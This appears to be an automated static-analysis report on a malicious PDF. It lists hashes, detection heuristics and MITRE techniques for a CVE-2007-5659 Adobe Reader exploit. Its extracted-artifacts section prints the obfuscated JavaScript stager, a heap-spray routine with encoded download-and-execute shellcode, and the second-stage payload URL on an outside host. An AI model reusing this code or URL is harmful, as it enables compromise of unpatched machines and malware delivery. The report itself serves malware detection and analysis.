Malicious PDF — malware analysis report

Static analysis result for SHA-256 6f5fa03ca94e2b87…

MALICIOUS

PDF

16.2 KB
MD5: 91d5a58526bbf08fbedfa5de261da58c SHA-1: 12bf3b814f34af1ad7dfe0bf3d29ee20f443f2b3 SHA-256: 6f5fa03ca94e2b87d2e52263c125f375fdb7d1236fb3b08668d36071eb4d7fc9
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download and execute a second-stage payload from the URL http://about-bear.com/info/sun.html/n002106201r0409Xf25b4247Y23b5df4a. The presence of multiple JavaScript exploit heuristics and a high ML classifier score indicate a malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://about-bear.com/info/sun.html/n002106201r0409Xf25b4247Y23b5df4a Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x3E89 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
2b391488148d1ed3dec2e980c3a0a282ff50dd7bda7c6a39911cb5ccae18f7a7		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x1966 5062 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var q__I__dM__w850m = new Array();var xn2JepNy6 = 0;var D8o1mPB2_8cq = "";function l_8a_Y7_vS_sx6l(w4__3APAwYQT_45, sc_h3woMV7tmFCs){var l8ScYMr71 = sc_h3woMV7tmFCs.toString();var YCp5__j_A_x = "";for(var joe_qHp__QY = 0; joe_qHp__QY < l8ScYMr71.length; joe_qHp__QY++) {var DWE_aR = parseInt(l8ScYMr71.substr(joe_qHp__QY, 1));if (!isNaN(DWE_aR)) {DWE_aR = DWE_aR.toString(16);if (DWE_aR.length == 1) { DWE_aR = "0" + DWE_aR; }else if (DWE_aR.length != 2) { DWE_aR = "00"; }YCp5__j_A_x = DWE_aR + YCp5__j_A_x;if (YCp5__j_A_x.length == 8) {break;}}}while(YCp5__j_A_x.length < 8) { YCp5__j_A_x = "0" + YCp5__j_A_x; }var e5SO_b04me_L = w4__3APAwYQT_45.toString(16);if (e5SO_b04me_L.length == 1) { e5SO_b04me_L = "0" + e5SO_b04me_L; }else if (e5SO_b04me_L.length != 2) { e5SO_b04me_L = "00"; }YCp5__j_A_x = "3" + e5SO_b04me_L + "P" + YCp5__j_A_x;return YCp5__j_A_x;}function O_62_I_Dj(wB_L_Nh, ifd_5Oe){var AtWsFC_a_Es = new Array("");var a_3j_8y3c = wB_L_Nh;var qq1_bvO_2;if ((qq1_bvO_2 = wB_L_Nh.lastIndexOf("%u00")) != -1) {if (qq1_bvO_2 + 6 == wB_L_Nh.length) {AtWsFC_a_Es[0] = wB_L_Nh.substr(qq1_bvO_2 + 4, 2);a_3j_8y3c = wB_L_Nh.substring(0, qq1_bvO_2);}}qq1_bvO_2 = 1;for (joe_qHp__QY = 0; joe_qHp__QY < ifd_5Oe.length; joe_qHp__QY++) {var R_6_3Wl2mX3 = ifd_5Oe.charCodeAt(joe_qHp__QY).toString(16);if (R_6_3Wl2mX3.length == 1) { R_6_3Wl2mX3 = "0" + R_6_3Wl2mX3; }AtWsFC_a_Es[qq1_bvO_2] = R_6_3Wl2mX3;qq1_bvO_2++;}joe_qHp__QY = AtWsFC_a_Es[0].length ? 0 : 1;AtWsFC_a_Es[qq1_bvO_2] = "00";AtWsFC_a_Es[qq1_bvO_2 + 1] = "00";qq1_bvO_2 += 2;if ((AtWsFC_a_Es.length - joe_qHp__QY) % 2) {AtWsFC_a_Es[qq1_bvO_2] = "00";}while(joe_qHp__QY < AtWsFC_a_Es.length) {a_3j_8y3c += "%u" + AtWsFC_a_Es[joe_qHp__QY + 1] + AtWsFC_a_Es[joe_qHp__QY];joe_qHp__QY += 2;}a_3j_8y3c += "%u0000";return a_3j_8y3c;}function D__qT_8Hbgi(b2Jm_H63_lWo, LHAv_Ex){while (b2Jm_H63_lWo.length*2<LHAv_Ex) {b2Jm_H63_lWo += b2Jm_H63_lWo;}b2Jm_H63_lWo = b2Jm_H63_lWo.substring(0,LHAv_Ex/2);return b2Jm_H63_lWo;}function JI4_4g(V24xI_Fk6, t6RER7, t4Q2_2X){var B_rH_qs__41_c = 0x0c0c0c0c;var b2Jm_H63_lWo = unescape(t6RER7);var ifd_5Oe = l_8a_Y7_vS_sx6l(V24xI_Fk6, t4Q2_2X);var aWXUBv2x = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var wB_L_Nh = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u5570%u4f74%u0043%u7468%u7074%u2f3a%u612f%u6f62%u7475%u622d%u6165%u2e72%u6f63%u2f6d%u6e69%u6f66%u732f%u6e75%u682e%u6d74%u2f6c%u306e%u3230%u3031%u3236%u3130%u3072%u3034%u5839%u3266%u6235%u3234%u3734%u3259%u6233%u6435%u3466%u0061";app.P_23Cn17 = unescape(O_62_I_Dj(wB_L_Nh, ifd_5Oe));var oX_Dg3SUa = 0x400000;var SAWkE5814DN_JJs = aWXUBv2x.length * 2;var LHAv_Ex = oX_Dg3SUa - (SAWkE5814DN_JJs+0x38);b2Jm_H63_lWo = D__qT_8Hbgi(b2Jm_H63_lWo, LHAv_Ex);var G7__LCbL27a = (B_rH_qs__41_c - 0x400000)/oX_Dg3SUa;for (var T1yq__32IP = 0; T1yq__32IP < G7__LCbL27a; T1yq__32IP++) {q__I__dM__w850m[T1yq__32IP] = b2Jm_H63_lWo + aWXUBv2x;}}function Sfb2a38f(){var C81Jl__q = "";for (joe_qHp__QY = 0; joe_qHp__QY < 12; joe_qHp__QY++) {C81Jl__q += unescape("%u0c0c%u0c0c");}var ISo751V = "";for (joe_qHp__QY = 0; joe_qHp__QY < 750; joe_qHp__Q
... (truncated)
legacy_pdfkit_stage_000.js
d5929554d5af4c69d74e8fcdc0a93b429e386aca47ad5dd430f67d878374515d		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x19BA 11425 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function L_1Pl37j10D(u_wpy8KP0__W, sd_H0N0g__Vs){var Bm70_hg_0ovS = new Array();var T5_jY_pj = 512;var dVGc4gQ0b = 21;var S__817Lb3 = 0;var n1E8GR_43 = 0;var UgUF_np0_3___D = 0;var CS_I__1_6_O_Br = "";var ntA8QW6K_xJ_e = "";var Qmf_YVqB4ILd = 6;try {var Bh_RXus6Opk = 0;if (app) {UgUF_np0_3___D = UgUF_np0_3___D + 2;sd_H0N0g__Vs = pr[Bh_RXus6Opk].subject;}} catch(e) { }UgUF_np0_3___D = UgUF_np0_3___D + 5;if (!u_wpy8KP0__W) { Bm70_hg_0ovS = new Array(112,61,200,246,240,249);} else {Bm70_hg_0ovS = u_wpy8KP0__W;}var l_sBKb___l = 0;var eiK_Dw11___7_k = 0;var t5la83i_3Jg = 0;while(eiK_Dw11___7_k < sd_H0N0g__Vs.length) {var bsH_sXa__k_w = sd_H0N0g__Vs.substr(eiK_Dw11___7_k, 2);var vdhtbvvo = parseInt(bsH_sXa__k_w, 21);if (l_sBKb___l >= Qmf_YVqB4ILd) {l_sBKb___l = 0;}vdhtbvvo -= Bm70_hg_0ovS[l_sBKb___l] * (t5la83i_3Jg + 2);var XpGJ_W_2p = Math;if (vdhtbvvo < 0) {vdhtbvvo -= XpGJ_W_2p.floor(vdhtbvvo / 256) * (T5_jY_pj / 2);}if (eiK_Dw11___7_k >= 0) {vdhtbvvo = String.fromCharCode(vdhtbvvo);}if (UgUF_np0_3___D == 6) {CS_I__1_6_O_Br += dS_Ar_IE_Qv0UV;} else if (UgUF_np0_3___D == 7) {CS_I__1_6_O_Br += vdhtbvvo;} else {CS_I__1_6_O_Br += eiK_Dw11___7_k;}l_sBKb___l++;eiK_Dw11___7_k += 2;t5la83i_3Jg++;}var q___5E_qHK0 = this;q___5E_qHK0['ev'+'al'](CS_I__1_6_O_Br);}
	L_1Pl37j10D(0, "42136kb70h24ad5525ba7hbb61bbbg6g1083231c542gb78ea56h1c3h6k6a5g058hab2c4a0i528ga26k187i1k2k7g2c9c18389j1k11aebb8d71b387686f3k3380304f1eag9j5e7d1e6415995a6g2g5b8e6126ae14c3bc1caj8h8i7c7c96815a9k11033967a26gad2e0h1d635j5g97a2be0k0gb5017g90ad1470993g525d915b20a41g2968167e7e13627c5fb53k963e5i122e9352933jaha28g1g8f1f542f2d203e9k0397acb7b88ca2279c84694b1k4k684f2823biac26bk9233824k89b25fa718743357a9beb843bh6a7ea53190b82h308408276hbi9k516253006g4707510cbe6327050g517c2d8h8b5j7648ag3k9f2f2a0i7i9k54b58i91768c5k47ah514h363b275g1b14ad0i8h9d6d7k310i5d55644e0497aja81c4462624c459k2i5a601k98718e0c1ia11j1k7c8ac03i4dbc6d330e2a0j4435b8a492621j0e617j3ia48k64ba379c1h816e62164d954f2e4d12080bbgbcc300a04a5g6k8j8h5eb14b742852c127bd3i9862949k6g286h3b5b4b5gb91ibe9k6jb2639c094cba8c4d36a6326b3f2g0590b0142e8a5k4e3135815d471604a65c5gaf1e622200003h9c1b6a88ak1295c3226k7e629j7i7i4f6h1b6k379a9b28bg35ad5d7fae842g6gb35bac009fc10hag4f7dc0627g8f34618g3jb63eagag499j49bk7jab4865147i814b343044616893b57d9c1i127cak590j838e2f7b26736h8hb36i7e2444456b541b4hb21g260ic30a82057e0i8g38489i55b940b89352ab618g1957547f7k679752ba496a2j3913ahb5376a757g8641114b1256341a059h691g2a9aa5808184822e4e0059317kah618d97255j7c1h613c7d0j00abb94f3h987db37g1a1090619k4b4ab877bk4918017e44625f5c3d30094e140ka2059gb5ad90be9a4i7cbd3k663h2d43970h050fb78d56a26g8bbb6k6255bd2e5abf11a94g1h1h6a1j5c8k921k4e9c0k3567b6b57ab5822k8h8c8531b9902c0h35ae793h308d3587b7339h402a4h48aa64c19095784e376d707i0e342f4b830g5i0d0jc3528ja39ga5844k6734507900bc1g99033aad036i299g1e619624a75cb91i9408bkaf6562415050b4204h24290661269j03b66c25ac4cag318d8868028eae606b49b968929h3b2j4d685fc19g95ag2695525268980870083g6e26ab3e6ec32g93827d8f7da24c62314834ak106c1aa90f5iad5g783i9859723a5554500526agc31520aj7eag8g4gb6885c9a340b6b5k0e3g9i4g06047c3f618fb39143181a236h80b1ab628g3764618k3g1d8h492c910i3c63158f7j68aa3g9e4b3f3k1iab3f0e35bg726j4g8a11760b1da609992c8a1d77af93701k925d76514f3e3e1d2d3gc3b01a0k9b198e51ag8258200ha46497b8b78a1b2f5f4c6f3997ba07307a2c0g6h9f7d3f627j1d9053373f05916g1c260k40863b980b6had139f1gac0g1295749c4b7e6k574b582k312k5048000j277faf14ag2d87c26k7b3c8f2c233e61aeaiaga80c4h86835541a32e4j6f39623109af4fa52e11727c1h615fbc580gbhaeac3h3i959j845524063f8i5cad03a428360h48586795506h8g1d0a21b20kbc93ae9ca8af7165aa7c8576a44f4218522d3k0f37ad569b85a12964515b4b5gb91ibe9j69ae8f9ka27c21ak454b8309597a3c0h93890428086h663j29905d0h2c1hb97f2g802h9i40303g4k124b8kafbkae8i93bk5i689d957i754d59576a30bhbi0eaa1ab25i8c0h5c1f678953a93f0i2a45b446b3b998919k376i8e4b1950b6b442938e2cb0a01e6k087j8129263d3a6f4ia19i907i2f2e7hai4133aj9734961ca15a9cai737e34086a6h534b86a63j1a2iba0450a2a21d706f4ea155b9088ga443a99bak105f357c526173431d0i5f1304acakaj3g9a8b9b4a49bd1bac2f1d2h85bb5hbf1g708i848jabag294518123360952583671d585d353k20b5083e0jbc5j3h1294058f1d1h7e619b4b4e035k27869kb37f48875959420gb01b2h307ac37ebg218a33804h5i066
... (truncated)
deobfuscated.js
13048208f8ecae627f3a7d5280ddc28900037fed35618a56b1a060a89de1cfc3		 deobfuscated-js PDF JavaScript deobfuscation pass 87376 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
42136kb70h24ad5525ba7hbb61bbbg6g1083231c542gb78ea56h1c3h6k6a5g058hab2c4a0i528ga26k187i1k2k7g2c9c18389j1k11aebb8d71b387686f3k3380304f1eag9j5e7d1e6415995a6g2g5b8e6126ae14c3bc1caj8h8i7c7c96815a9k11033967a26gad2e0h1d635j5g97a2be0k0gb5017g90ad1470993g525d915b20a41g2968167e7e13627c5fb53k963e5i122e9352933jaha28g1g8f1f542f2d203e9k0397acb7b88ca2279c84694b1k4k684f2823biac26bk9233824k89b25fa718743357a9beb843bh6a7ea53190b82h308408276hbi9k516253006g4707510cbe6327050g517c2d8h8b5j7648ag3k9f2f2a0i7i9k54b58i91768c5k47ah514h363b275g1b14ad0i8h9d6d7k310i5d55644e0497aja81c4462624c459k2i5a601k98718e0c1ia11j1k7c8ac03i4dbc6d330e2a0j4435b8a492621j0e617j3ia48k64ba379c1h816e62164d954f2e4d12080bbgbcc300a04a5g6k8j8h5eb14b742852c127bd3i9862949k6g286h3b5b4b5gb91ibe9k6jb2639c094cba8c4d36a6326b3f2g0590b0142e8a5k4e3135815d471604a65c5gaf1e622200003h9c1b6a88ak1295c3226k7e629j7i7i4f6h1b6k379a9b28bg35ad5d7fae842g6gb35bac009fc10hag4f7dc0627g8f34618g3jb63eagag499j49bk7jab4865147i814b343044616893b57d9c1i127cak590j838e2f7b26736h8hb36i7e2444456b541b4hb21g260ic30a82057e0i8g38489i55b940b89352ab618g1957547f7k679752ba496a2j3913ahb5376a757g8641114b1256341a059h691g2a9aa5808184822e4e0059317kah618d97255j7c1h613c7d0j00abb94f3h987db37g1a1090619k4b4ab877bk4918017e44625f5c3d30094e140ka2059gb5ad90be9a4i7cbd3k663h2d43970h050fb78d56a26g8bbb6k6255bd2e5abf11a94g1h1h6a1j5c8k921k4e9c0k3567b6b57ab5822k8h8c8531b9902c0h35ae793h308d3587b7339h402a4h48aa64c19095784e376d707i0e342f4b830g5i0d0jc3528ja39ga5844k6734507900bc1g99033aad036i299g1e619624a75cb91i9408bkaf6562415050b4204h24290661269j03b66c25ac4cag318d8868028eae606b49b968929h3b2j4d685fc19g95ag2695525268980870083g6e26ab3e6ec32g93827d8f7da24c62314834ak106c1aa90f5iad5g783i9859723a5554500526agc31520aj7eag8g4gb6885c9a340b6b5k0e3g9i4g06047c3f618fb39143181a236h80b1ab628g3764618k3g1d8h492c910i3c63158f7j68aa3g9e4b3f3k1iab3f0e35bg726j4g8a11760b1da609992c8a1d77af93701k925d76514f3e3e1d2d3gc3b01a0k9b198e51ag8258200ha46497b8b78a1b2f5f4c6f3997ba07307a2c0g6h9f7d3f627j1d9053373f05916g1c260k40863b980b6had139f1gac0g1295749c4b7e6k574b582k312k5048000j277faf14ag2d87c26k7b3c8f2c233e61aeaiaga80c4h86835541a32e4j6f39623109af4fa52e11727c1h615fbc580gbhaeac3h3i959j845524063f8i5cad03a428360h48586795506h8g1d0a21b20kbc93ae9ca8af7165aa7c8576a44f4218522d3k0f37ad569b85a12964515b4b5gb91ibe9j69ae8f9ka27c21ak454b8309597a3c0h93890428086h663j29905d0h2c1hb97f2g802h9i40303g4k124b8kafbkae8i93bk5i689d957i754d59576a30bhbi0eaa1ab25i8c0h5c1f678953a93f0i2a45b446b3b998919k376i8e4b1950b6b442938e2cb0a01e6k087j8129263d3a6f4ia19i907i2f2e7hai4133aj9734961ca15a9cai737e34086a6h534b86a63j1a2iba0450a2a21d706f4ea155b9088ga443a99bak105f357c526173431d0i5f1304acakaj3g9a8b9b4a49bd1bac2f1d2h85bb5hbf1g708i848jabag294518123360952583671d585d353k20b5083e0jbc5j3h1294058f1d1h7e619b4b4e035k27869kb37f48875959420gb01b2h307ac37ebg218a33804h5i066j5b4b44428i1aaha9aj8j919d6g98ab6j4b57b55670140dab16015h8f2c68849i214bac3k283hb49ha9aj8b2d99804h4ba1882c152hba48583fa54g7ja030c3610c5a4401a1bac002af6h676k9j4c110g0c265g0264af1dbg6k99bh87a17c2g7060587k0h201d07c3458a946d1a6j16318c1b6h318aag6a0h3dba7i95766h807f20212c00b2472d06b8803e0h0674134ia4ad8f309329257961b78ga2a5000b316j5633b80j0854c3826j926bbc4ha71d3k1b1f1c78bg4dak95adbf87bg8b886j5b27a3337e0f9jag747d2k62016i24330i5k975f21220i9b1g25b492bd6a769i813i8a00a1313g0k68bc3c0j277e4g4hak8602363a1i4175657d2294860j6a61925gb9bc02b477933e4h16643k528h27ac435j1h3bc36hc31fbc9j8i4d7i0k6j21571030aa1458a977899162b36261716g5a5a3k4d1c53aj0e16269i397c5h8gbj4b13279j5k6b0ac2aj3532468897617ha7bf0b5faebc5212af577076307376154f908j4baead986257116i964e8c4e0f5bac3j41939ic359b38c6a835a5f47314i523f3f2a771a1j7d0592c29ka0619i39565e83b19ia098234h805g5a39aa1c5636007g4k9i113f982jbi9g8f236b7caj2c08c1bbb47a2f9b7k70553dbe6h5c53agc29c2a679d185j59802a8e8g2b4e1kb2471ka0bh0dc29b52659k849f6h96215a0085bb4718459b4370ac9f106h285k3g339f2322b16jbc7i9fbj87b285204e83207h6111a464ad0h1i015575725cbc9d3j4g24b1443b84188026422j4h1a256h8hab28ag0k318aa2628d5965496b394b0j060c360f2gc15i981b7g3a6bbb557320bdbd3hai7e80a56k70a638617a52032iag2a4fbb620i906e1e8cab945j4b0b2e317866011c7d9a25356aai6j4iadbe0k6e1a973h747d4da6c3343f652d4f54
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.